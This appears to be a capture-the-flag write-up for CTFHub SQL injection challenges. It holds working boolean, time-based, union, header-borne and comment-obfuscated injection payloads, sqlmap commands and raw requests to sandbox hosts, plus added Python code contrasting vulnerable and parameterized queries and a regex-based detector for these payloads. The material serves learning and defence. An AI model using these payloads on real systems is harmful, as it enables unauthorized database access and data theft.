CTFHUB --- SQL injection

SQL -- Boolean-based injection

1 and length(database())=4

We use the count() function to determine how many tables the sqli database contains:

1 and (select count(table_name) from information_schema.tables where table_schema='sqli' )<3

1 and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>109
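The boolean probes above only work because the id is spliced into the SQL text. As an added example (not code from the original post or from CTFHub), here is a small Python/sqlite3 model of that vulnerable pattern beside its parameterized fix; the table `news`, the column `data`, the rows and the function names are constructed assumptions. SQLite has no `database()` function, so the oracle is shown with the `1 and 1=1` / `1 and 1=2` pair and a one-column union; the same contrast applies to the cookie, User-Agent and Referer variants later on the page.

```python
import sqlite3

def make_db():
    """Constructed in-memory stand-in for the challenge's MySQL 'sqli' database
    (table, column and rows are assumptions, not the challenge's schema)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE news (id INTEGER PRIMARY KEY, data TEXT)")
    conn.executemany("INSERT INTO news VALUES (?, ?)",
                     [(1, "hello,world"), (2, "welcome to ctfhub")])
    return conn

def lookup_vulnerable(conn, user_id):
    """The pattern every challenge on this page relies on: the id is spliced
    into the SQL text, so whatever the client sends is parsed as SQL."""
    sql = "SELECT data FROM news WHERE id=" + user_id
    return [row[0] for row in conn.execute(sql)]

def lookup_safe(conn, user_id):
    """Hardened form: the id is bound as a parameter, so the same input is
    compared as a value and never parsed as SQL. This holds regardless of
    whether the value came from the query string, a cookie, User-Agent or Referer."""
    rows = conn.execute("SELECT data FROM news WHERE id=?", (user_id,))
    return [row[0] for row in rows]

def leaks_one_bit(lookup, conn):
    """True when the page's two boolean probes produce different responses,
    i.e. the endpoint can be used as a yes/no oracle."""
    return lookup(conn, "1 and 1=1") != lookup(conn, "1 and 1=2")

def leaks_union(lookup, conn):
    """True when a union payload makes the endpoint return attacker-chosen
    text instead of a real row."""
    return "injected" in lookup(conn, "-1 union select 'injected'")

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("vulnerable", lookup_vulnerable), ("parameterized", lookup_safe)):
        print(name, "boolean oracle:", leaks_one_bit(fn, db),
              "union:", leaks_union(fn, db), "normal id=1:", fn(db, "1"))
```

The parameterized version still answers the legitimate request `id=1` correctly; it simply refuses to treat `1 and 1=1` as anything but a (non-matching) value, which is what removes the one-bit-per-request oracle the boolean and time-based sections depend on.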

 

sqlmap.py -u <login URL> --dbs

sqlmap.py -u <URL> -D sqli --tables   # lists the tables in the database (you get to know these options after using them a few times)

sqlmap.py -u <URL> -D sqli -T flag --columns --dump


Time-based injection

1 and if(length(database())=5,sleep(3),1)
1 and if(length(database())=4,sleep(3),1)
1 and if(length(database())=3,sleep(3),1)


1 and if(ascii(substr(database(),1,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1) ascii(s)=115

1 and if(ascii(substr(database(),2,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1) ascii(q)=113

1 and if(ascii(substr(database(),3,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=110,sleep(3),1) ascii(l)=110

1 and if(ascii(substr(database(),4,1))>110,sleep(3),1)
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1) ascii(i)=105

......

Number of tables in the sqli database

1 and if((select count(table_name) from information_schema.tables
where table_schema=database())=2,sleep(3),1)


1 and if(ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
ascii(n)=110

1 and if(ascii(substr((select table_name from information_schema.tables
where table_schema=database() limit 1,1),1,1))=102,sleep(3),1)
ascii(f)=102


MySQL structure

1 and 1=1

-1

1 order by 3

id=-1 union select 1,database()

-1 union select 1,database()
# gives the database name: sqli

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
# gives the table names

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='gicfxvzawq'
# gives the column names

-1 union select 1,group_concat(mmtpisrhwd) from sqli.gicfxvzawq
# gives the data in the table


Cookie injection

GET / HTTP/1.1
Host: challenge-d74d23b5527918d6.sandbox.ctfhub.com:10800
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: id=1; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Connection: close

Cookie: id=-1 union select 1,group_concat(qbqjfqgvtc) from sqli.xngjcgmzda



User-Agent injection


GET / HTTP/1.1
Host: challenge-c1e9962261230a4e.sandbox.ctfhub.com:10800
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

User-Agent:-1 union select database(),1

User-Agent:-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

User-Agent:-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='sunjbkwrop'


Space filtering

0/**/union/**/select/**/1,2

0/**/union/**/select/**/1,database()/**/

0/**/union/**/select/**/1,group_concat(table_name)/**/from/**/information_schema.tables/**/where/**/table_schema='sqli'

0/**/union/**/select/**/1,group_concat(column_name)/**/from/**/information_schema.columns/**/where/**/table_name='iyowhwbjtb'

0/**/union/**/select/**/1,group_concat(nzrquebpjw)/**/from/**/iyowhwbjtb


Referer injection

referer:id=-1 union select database(),1

referer:id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

referer:-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='rntemniypk'

referer:-1 union select 1,group_concat(jsxfbzclrh) from sqli.rntemniypk
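The Cookie, User-Agent and Referer sections deliver the same payload shapes through headers instead of the query string, and the space-filter section swaps `/**/` comments for spaces. As an added example (not from the original post or from CTFHub), the Python below turns the page's payload families into detection signatures and runs them over constructed request-log entries, URL-decoding and stripping `/**/` comments first so the space-filter bypass is still caught; the log fields, the function names and the placeholder table/column names are assumptions. Signature matching is a triage aid with false positives; the actual fix is binding user input as query parameters.

```python
import re
from urllib.parse import unquote_plus

# Signature families taken from the payloads on this page. Matching them is a
# detection aid only; the fix is to bind user input as query parameters.
SIGNATURES = {
    "boolean": re.compile(r"\b(and|or)\s+\(?\s*(length|ascii|substr|select)\b", re.I),
    "time":    re.compile(r"\bif\s*\(.*\b(sleep|benchmark)\s*\(", re.I),
    "union":   re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "schema":  re.compile(r"\binformation_schema\.(tables|columns)\b", re.I),
}

# Every field an application might read into a query is inspected, because the
# cookie, User-Agent and Referer challenges show headers are attacker input too.
FIELDS = ("path", "ua", "referer", "cookie")

def normalize(value):
    """Undo the evasions seen on the page before matching: URL encoding and
    the /**/ comment used in place of spaces. Whitespace is then collapsed."""
    text = unquote_plus(value)
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def inspect(entry):
    """Return the set of (field, signature) pairs that fire for one request."""
    hits = set()
    for field in FIELDS:
        text = normalize(entry.get(field, ""))
        for name, rx in SIGNATURES.items():
            if rx.search(text):
                hits.add((field, name))
    return hits

def scan(log):
    """Map log index -> hits, for entries that triggered at least one signature."""
    results = {}
    for i, entry in enumerate(log):
        hits = inspect(entry)
        if hits:
            results[i] = hits
    return results

UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
# Constructed log entries mirroring the payload shapes on this page; the
# placeholder table/column names are invented, not the challenge's.
SAMPLE_LOG = [
    {"path": "/?id=1", "ua": UA, "referer": "-", "cookie": "id=1"},
    {"path": "/?id=1%20and%20length(database())=4", "ua": UA, "referer": "-", "cookie": "id=1"},
    {"path": "/?id=1%20and%20if(ascii(substr(database(),1,1))>110,sleep(3),1)",
     "ua": UA, "referer": "-", "cookie": "id=1"},
    {"path": "/?id=0/**/union/**/select/**/1,2", "ua": UA, "referer": "-", "cookie": "id=1"},
    {"path": "/", "ua": "-1 union select database(),1", "referer": "-", "cookie": "id=1"},
    {"path": "/", "ua": UA, "cookie": "id=1",
     "referer": "id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'"},
    {"path": "/", "ua": UA, "referer": "-",
     "cookie": "id=-1 union select 1,group_concat(flag_col) from sqli.flag_tbl"},
]

if __name__ == "__main__":
    for i, hits in sorted(scan(SAMPLE_LOG).items()):
        print(i, sorted(hits))
```

Because normalization runs before matching, the `/**/` payloads are flagged exactly like their spaced equivalents, and because headers are inspected alongside the path, the cookie, User-Agent and Referer variants are reported with the field they arrived in.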

 

posted @ 2022-04-06 21:34  TinKode